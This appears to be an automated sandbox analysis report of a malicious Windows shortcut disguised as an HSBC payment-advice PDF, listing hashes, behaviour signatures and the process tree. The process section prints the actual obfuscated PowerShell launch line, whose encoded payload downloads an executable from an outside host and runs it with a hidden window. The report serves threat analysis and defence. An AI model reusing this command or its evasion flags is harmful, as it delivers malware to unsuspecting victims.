Analysis
- max time kernel: 117s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 26-07-2024 11:02
Static task
- static1
Behavioral task
- behavioral1
  Sample: Payment Advice__HSBC Banking.pdf.lnk
  Resource: win7-20240705-en
  5 signatures, 150 seconds
Behavioral task
- behavioral2
  Sample: Payment Advice__HSBC Banking.pdf.lnk
  Resource: win10v2004-20240709-en
  13 signatures, 150 seconds
General
- Target: Payment Advice__HSBC Banking.pdf.lnk
- Size: 2KB
- MD5: a38b0a4d0768ba8ce7c73904b55ee9ff
- SHA1: a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8
- SHA256: 3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809
- SHA512: 4159cd37110d910624b8bb5c837e70668b3e6d795e1ab276ea32f5ab315509dedf11bd865d4c1be41f9cec698235453996939a0ac8a45f36a28a45bdf28b7cf8
- Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid | process):
  2860 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 2860 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description | pid | process | target process):
  PID 2136 wrote to memory of 2536 | 2136 | cmd.exe | cmd.exe
  PID 2136 wrote to memory of 2536 | 2136 | cmd.exe | cmd.exe
  PID 2136 wrote to memory of 2536 | 2136 | cmd.exe | cmd.exe
  PID 2536 wrote to memory of 2860 | 2536 | cmd.exe | powershell.exe
  PID 2536 wrote to memory of 2860 | 2536 | cmd.exe | powershell.exe
  PID 2536 wrote to memory of 2860 | 2536 | cmd.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Payment Advice__HSBC Banking.pdf.lnk"
  - Suspicious use of WriteProcessMemory
  PID: 2136
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
    - Suspicious use of WriteProcessMemory
    PID: 2536
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2860